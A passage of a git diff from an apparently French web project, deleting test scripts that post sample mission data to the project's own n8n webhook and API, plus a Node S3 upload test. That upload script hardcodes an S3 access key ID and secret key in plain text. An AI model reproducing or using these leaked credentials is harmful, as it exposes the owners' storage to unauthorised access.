"❌ Erreur 401 Unauthorized" - echo " Causes possibles:" - echo " 1. Mot de passe incorrect" - echo " 2. 2FA activé - nécessite un mot de passe d'application" - echo " 3. Compte suspendu ou désactivé" - echo " 4. Email incorrect" -else - echo "⚠️ Erreur HTTP $HTTP_CODE" - echo " Vérifiez la connexion réseau et l'URL" -fi -echo "" diff --git a/test-n8n-curl-env.sh b/test-n8n-curl-env.sh deleted file mode 100644 index 9b33ccc..0000000 --- a/test-n8n-curl-env.sh +++ /dev/null @@ -1,52 +0,0 @@ -#!/bin/bash - -# Curl simple utilisant les variables d'environnement -# Charge automatiquement .env.local si présent - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Utiliser les variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie" - echo " Vérifiez votre fichier .env.local ou exportez N8N_API_KEY" - exit 1 -fi - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test webhook N8N" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }" \ - -s | jq '.' - -echo "" -echo "✅ Test terminé" diff --git a/test-n8n-curl-precise.sh b/test-n8n-curl-precise.sh deleted file mode 100644 index 5e3b5e4..0000000 --- a/test-n8n-curl-precise.sh +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/bash - -# Version curl simple et précise -# Charge .env.local automatiquement - -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" - -curl -X POST "https://brain.slm-lab.net/webhook-test/mission-created" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"intention\": \"\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -s | jq '.' diff --git a/test-n8n-curl.sh b/test-n8n-curl.sh deleted file mode 100644 index d196ea2..0000000 --- a/test-n8n-curl.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash - -# Curl simple pour tester la sortie N8N -# Remplacez les valeurs entre <...> par vos vraies valeurs - -curl -X POST "https://hub.slm-lab.net/api/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: " \ - -d '{ - "missionId": "3103ec1a-acde-4025-9ead-4e1a0ddc047c", - "name": "SEFFIR", - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "gitRepoUrl": "", - "leantimeProjectId": "517", - "documentationCollectionId": "08919836-435a-466f-a38a-014991759da2", - "rocketchatChannelId": "ByehQjC44FwMeiLbX", - "donneurDOrdre": "group", - "projection": "long", - "missionType": "remote", - "niveau": "s" - }' \ - -v diff --git a/test-n8n-inline.sh b/test-n8n-inline.sh deleted file mode 100644 index 038aecf..0000000 --- a/test-n8n-inline.sh +++ /dev/null @@ -1,86 +0,0 @@ -#!/bin/bash - -# Version inline avec paramètres -# Usage: ./test-n8n-inline.sh [MISSION_ID] [PROJECT_NAME] - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -PROJECT_NAME="${2:-SEFFIR}" - -python3 << EOF -import urllib.request -import json -import os -import sys - -# Charger .env.local -env_vars = {} -if os.path.exists('.env.local'): - with open('.env.local') as f: - for line in f: - if '=' in line and not line.strip().startswith('#'): - key, value = line.strip().split('=', 1) - env_vars[key] = value - -webhook_url = "https://brain.slm-lab.net/webhook-test/mission-created" -mission_id = "${MISSION_ID}" -project_name = "${PROJECT_NAME}" -api_key = env_vars.get('N8N_API_KEY', os.environ.get('N8N_API_KEY')) -api_url = env_vars.get('NEXT_PUBLIC_API_URL', os.environ.get('NEXT_PUBLIC_API_URL', 'https://hub.slm-lab.net/api')) - -if not api_key: - print("❌ Erreur: N8N_API_KEY n'est pas définie") - sys.exit(1) - -print(f"🧪 Test du webhook N8N") -print(f"Mission ID: {mission_id}") -print(f"Project Name: {project_name}") -print("") - -data = { - "name": project_name, - "oddScope": ["odd-4"], - "niveau": "s", - "intention": "", - "missionType": "remote", - "donneurDOrdre": "group", - "projection": "long", - "services": [], - "participation": "ouvert", - "profils": [], - "guardians": {}, - "volunteers": [], - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "missionId": mission_id, - "logoPath": f"missions/{mission_id}/logo.png", - "logoUrl": f"https://hub.slm-lab.net/api/missions/image/missions/{mission_id}/logo.png", - "config": { - "N8N_API_KEY": api_key, - "MISSION_API_URL": api_url - } -} - -req = urllib.request.Request( - webhook_url, - data=json.dumps(data).encode('utf-8'), - headers={'Content-Type': 'application/json'} -) - -try: - with urllib.request.urlopen(req) as response: - print(f"✅ Status: {response.status} {response.reason}") - print(f"📄 Réponse:") - response_data = json.loads(response.read().decode('utf-8')) - print(json.dumps(response_data, indent=2)) -except urllib.error.HTTPError as e: - print(f"❌ HTTP Error {e.code}: {e.reason}") - try: - error_body = e.read().decode('utf-8') - print(f"📄 Corps de l'erreur:") - print(json.dumps(json.loads(error_body), indent=2)) - except: - print(error_body) - sys.exit(1) -except Exception as e: - print(f"❌ Erreur: {e}") - sys.exit(1) -EOF diff --git a/test-n8n-python.py b/test-n8n-python.py deleted file mode 100644 index 67bb349..0000000 --- a/test-n8n-python.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python3 -""" -Script pour tester le webhook N8N -Usage: python3 test-n8n-python.py [MISSION_ID] [PROJECT_NAME] -""" - -import urllib.request -import json -import os -import sys - -# Charger .env.local -env_vars = {} -if os.path.exists('.env.local'): - with open('.env.local') as f: - for line in f: - if '=' in line and not line.strip().startswith('#'): - key, value = line.strip().split('=', 1) - env_vars[key] = value - -# Paramètres depuis la ligne de commande ou variables d'environnement -mission_id = sys.argv[1] if len(sys.argv) > 1 else os.environ.get('MISSION_ID', '3103ec1a-acde-4025-9ead-4e1a0ddc047c') -project_name = sys.argv[2] if len(sys.argv) > 2 else os.environ.get('PROJECT_NAME', 'SEFFIR') - -webhook_url = "https://brain.slm-lab.net/webhook-test/mission-created" -api_key = env_vars.get('N8N_API_KEY', os.environ.get('N8N_API_KEY')) -api_url = env_vars.get('NEXT_PUBLIC_API_URL', os.environ.get('NEXT_PUBLIC_API_URL', 'https://hub.slm-lab.net/api')) - -if not api_key: - print("❌ Erreur: N8N_API_KEY n'est pas définie") - print(" Vérifiez votre fichier .env.local ou exportez N8N_API_KEY") - sys.exit(1) - -print(f"🧪 Test du webhook N8N") -print(f"━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━") -print(f"Webhook URL: {webhook_url}") -print(f"Mission ID: {mission_id}") -print(f"Project Name: {project_name}") -print(f"") - -data = { - "name": project_name, - "oddScope": ["odd-4"], - "niveau": "s", - "intention": "", - "missionType": "remote", - "donneurDOrdre": "group", - "projection": "long", - "services": [], - "participation": "ouvert", - "profils": [], - "guardians": {}, - "volunteers": [], - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "missionId": mission_id, - "logoPath": f"missions/{mission_id}/logo.png", - "logoUrl": f"https://hub.slm-lab.net/api/missions/image/missions/{mission_id}/logo.png", - "config": { - "N8N_API_KEY": api_key, - "MISSION_API_URL": api_url - } -} - -req = urllib.request.Request( - webhook_url, - data=json.dumps(data).encode('utf-8'), - headers={'Content-Type': 'application/json'} -) - -try: - with urllib.request.urlopen(req) as response: - print(f"✅ Status: {response.status} {response.reason}") - print(f"📄 Réponse:") - response_data = json.loads(response.read().decode('utf-8')) - print(json.dumps(response_data, indent=2)) -except urllib.error.HTTPError as e: - print(f"❌ HTTP Error {e.code}: {e.reason}") - try: - error_body = e.read().decode('utf-8') - print(f"📄 Corps de l'erreur:") - print(json.dumps(json.loads(error_body), indent=2)) - except: - print(error_body) - sys.exit(1) -except Exception as e: - print(f"❌ Erreur: {e}") - sys.exit(1) diff --git a/test-n8n-simple-vm.sh b/test-n8n-simple-vm.sh deleted file mode 100644 index beb8381..0000000 --- a/test-n8n-simple-vm.sh +++ /dev/null @@ -1,45 +0,0 @@ -#!/bin/bash - -# Version simple pour la VM - utilise curl si disponible -# Usage: ./test-n8n-simple-vm.sh [MISSION_ID] - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" - -if [ -z "$N8N_API_KEY" ]; then - echo "❌ N8N_API_KEY non définie" - exit 1 -fi - -echo "🧪 Test webhook N8N: https://brain.slm-lab.net/webhook-test/mission-created" -echo "" - -curl -X POST "https://brain.slm-lab.net/webhook-test/mission-created" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -s | python3 -m json.tool 2>/dev/null || cat diff --git a/test-n8n-simple.sh b/test-n8n-simple.sh deleted file mode 100644 index a430d14..0000000 --- a/test-n8n-simple.sh +++ /dev/null @@ -1,39 +0,0 @@ -#!/bin/bash - -# Version simple - charge .env.local automatiquement -# Usage: ./test-n8n-simple.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local -if [ -f .env.local ]; then - set -a - source .env.local - set +a -fi - -# Variables -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -if [ -z "$API_KEY" ]; then - echo "❌ N8N_API_KEY non définie" - exit 1 -fi - -echo "🧪 Test avec RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\" - }" \ - -s | jq '.' diff --git a/test-n8n-vm.sh b/test-n8n-vm.sh deleted file mode 100644 index 32e3933..0000000 --- a/test-n8n-vm.sh +++ /dev/null @@ -1,158 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N depuis la VM -# Utilise les outils disponibles: curl, wget, python3, node - -# Charger .env.local si présent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Variables -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie" - echo " Vérifiez votre fichier .env.local ou exportez N8N_API_KEY" - exit 1 -fi - -echo "🧪 Test du webhook N8N depuis la VM" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "API URL: $API_URL" -echo "" - -# Préparer le JSON -JSON_DATA=$(cat < /dev/null; then - echo "📤 Utilisation de curl..." - echo "" - curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "$JSON_DATA" \ - -v -elif command -v wget &> /dev/null; then - echo "📤 Utilisation de wget..." - echo "" - echo "$JSON_DATA" | wget --method=POST \ - --header="Content-Type: application/json" \ - --body-data=- \ - --output-document=- \ - --server-response \ - "${WEBHOOK_URL}" 2>&1 -elif command -v python3 &> /dev/null; then - echo "📤 Utilisation de python3..." - echo "" - python3 < /dev/null; then - echo "📤 Utilisation de node..." - echo "" - node < { - console.log(\`Status: \${res.statusCode} \${res.statusMessage}\`); - console.log(\`Headers:\`, res.headers); - console.log(\`\nResponse Body:\`); - - let body = ''; - res.on('data', (chunk) => { body += chunk; }); - res.on('end', () => { - try { - console.log(JSON.stringify(JSON.parse(body), null, 2)); - } catch (e) { - console.log(body); - } - }); -}); - -req.on('error', (e) => { - console.error(\`Erreur: \${e.message}\`); - process.exit(1); -}); - -req.write(JSON.stringify(data)); -req.end(); -NODE_SCRIPT -else - echo "❌ Aucun outil disponible (curl, wget, python3, node)" - exit 1 -fi - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Vérifiez les logs N8N pour voir la structure de la réponse RocketChat" diff --git a/test-n8n-webhook-direct.sh b/test-n8n-webhook-direct.sh deleted file mode 100644 index f1ccb3c..0000000 --- a/test-n8n-webhook-direct.sh +++ /dev/null @@ -1,62 +0,0 @@ -#!/bin/bash - -# Test direct du webhook N8N -# Usage: ./test-n8n-webhook-direct.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local si présent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# URL du webhook N8N -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test du webhook N8N directement" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -# Test avec tous les champs (simule ce que Next.js envoie à N8N) -echo "📤 Envoi de la requête complète au webhook N8N..." -echo "" - -curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"hasGuardians\": true, - \"volunteersCount\": 0, - \"hasLogo\": true, - \"config\": { - \"MISSION_API_URL\": \"${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}\", - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"ROCKETCHAT_API_URL\": \"${ROCKET_CHAT_API_URL:-https://parole.slm-lab.net}\", - \"ROCKETCHAT_AUTH_TOKEN\": \"${ROCKET_CHAT_TOKEN}\", - \"ROCKETCHAT_USER_ID\": \"${ROCKET_CHAT_USER_ID}\" - }, - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\" - }" \ - -v - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Note: Ce test déclenche le workflow N8N complet." -echo " Vérifiez les logs N8N pour voir la structure exacte de la réponse RocketChat." diff --git a/test-n8n-webhook-env.sh b/test-n8n-webhook-env.sh deleted file mode 100644 index 6612122..0000000 --- a/test-n8n-webhook-env.sh +++ /dev/null @@ -1,116 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N en utilisant les variables d'environnement -# Usage: source .env.local && ./test-n8n-webhook-env.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger les variables d'environnement depuis .env.local si elles existent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Configuration depuis les variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie dans les variables d'environnement" - echo " Assurez-vous d'avoir chargé .env.local ou défini N8N_API_KEY" - exit 1 -fi - -# Paramètres (utiliser ceux fournis ou des valeurs par défaut pour test) -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test du webhook N8N mission-created" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "API Key: ${API_KEY:0:10}... (masquée)" -echo "" - -# Test principal avec tous les champs -echo "📤 Envoi de la requête avec RocketChat Channel ID..." -echo "" - -RESPONSE=$(curl -s -w "\n%{http_code}" -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }") - -HTTP_CODE=$(echo "$RESPONSE" | tail -n1) -BODY=$(echo "$RESPONSE" | sed '$d') - -echo "📥 Réponse HTTP: $HTTP_CODE" -echo "📄 Corps de la réponse:" -echo "$BODY" | jq '.' 2>/dev/null || echo "$BODY" -echo "" - -if [ "$HTTP_CODE" = "200" ]; then - echo "✅ Succès! La mission a été mise à jour." -else - echo "❌ Erreur HTTP $HTTP_CODE" -fi - -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "" -echo "🔍 Tests supplémentaires avec différents formats de rocketchatChannelId:" -echo "" - -# Test 1: ID valide -echo "=== Test 1: ID RocketChat valide ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"ByehQjC44FwMeiLbX\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" - -# Test 2: null -echo "=== Test 2: ID RocketChat null ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": null - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" - -# Test 3: chaîne vide -echo "=== Test 3: ID RocketChat chaîne vide ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" - -# Test 4: non fourni -echo "=== Test 4: ID RocketChat non fourni ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" diff --git a/test-n8n-webhook-precise.sh b/test-n8n-webhook-precise.sh deleted file mode 100644 index 43b4e38..0000000 --- a/test-n8n-webhook-precise.sh +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# Test précis du webhook N8N avec la structure exacte envoyée par Next.js -# Usage: ./test-n8n-webhook-precise.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# URL du webhook N8N -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" - -# Variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test précis du webhook N8N" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -# Structure exacte envoyée par Next.js (après nettoyage dans n8n-service.ts) -curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"intention\": \"\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -v - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Ce test déclenche le workflow N8N complet." -echo " Vérifiez les logs N8N pour voir:" -echo " 1. La structure de la réponse RocketChat" -echo " 2. Le chemin exact pour accéder à channel._id" -echo " 3. La valeur exacte de rocketchatChannelId dans 'Save Mission To API'" diff --git a/test-n8n-webhook.sh b/test-n8n-webhook.sh deleted file mode 100644 index 7e88a7a..0000000 --- a/test-n8n-webhook.sh +++ /dev/null @@ -1,84 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N mission-created -# Usage: ./test-n8n-webhook.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Configuration -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY:-your-api-key-here}" - -# Paramètres (utiliser ceux fournis ou des valeurs par défaut pour test) -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "Testing N8N webhook output..." -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }" \ - -v - -echo "" -echo "" -echo "Test avec différents formats de rocketchatChannelId:" -echo "" - -# Test 1: ID valide -echo "=== Test 1: ID RocketChat valide ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"ByehQjC44FwMeiLbX\" - }" \ - -s | jq '.' - -echo "" -echo "=== Test 2: ID RocketChat null ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": null - }" \ - -s | jq '.' - -echo "" -echo "=== Test 3: ID RocketChat chaîne vide ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"\" - }" \ - -s | jq '.' - -echo "" -echo "=== Test 4: ID RocketChat non fourni ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\" - }" \ - -s | jq '.' diff --git a/test-upload.js b/test-upload.js deleted file mode 100644 index bc95415..0000000 --- a/test-upload.js +++ /dev/null @@ -1,36 +0,0 @@ -const { S3Client, PutObjectCommand } = require('@aws-sdk/client-s3'); -const fs = require('fs'); - -const s3Config = { - endpoint: 'https://dome-api.slm-lab.net', - region: 'us-east-1', - credentials: { - accessKeyId: 'LwgeE1ntADD20OuWC88S3pR0EaO7FtO4', - secretAccessKey: 'gbdrqJsXyU4IFxsfz9xdrnQeMRy2eZHeqQRrAeBR' - }, - forcePathStyle: true -}; - -const s3Client = new S3Client(s3Config); - -async function uploadFile() { - try { - const fileContent = fs.readFileSync('/Users/alma/Documents/test.png'); - - const command = new PutObjectCommand({ - Bucket: 'missions', - Key: 'test-mission/logo.png', - Body: fileContent, - ContentType: 'image/png', - ACL: 'public-read' - }); - - console.log('Uploading file...'); - const response = await s3Client.send(command); - console.log('Upload successful!', response); - } catch (error) { - console.error('Error uploading file:', error); - } -} - -uploadFile(); \ No newline at end of file diff --git a/update-imports.js b/update-imports.js deleted file mode 100644 index d2f5464..0000000 --- a/update-imports.js +++ /dev/null @@ -1,102 +0,0 @@ -const fs = require('fs'); -const path = require('path'); - -// Function to recursively find all TypeScript files -function findTsFiles(dir, fileList = []) { - const files = fs.readdirSync(dir); - - files.forEach(file => { - const filePath = path.join(dir, file); - const stat = fs.statSync(filePath); - - if (stat.isDirectory() && !filePath.includes('node_modules') && !filePath.includes('.next')) { - fileList = findTsFiles(filePath, fileList); - } else if ( - stat.isFile() && - (filePath.endsWith('.ts') || filePath.endsWith('.tsx')) && - !filePath.includes('node_modules') && - !filePath.includes('.next') - ) { - fileList.push(filePath); - } - }); - - return fileList; -} - -// Function to update import statements in a file -function updateImportInFile(filePath) 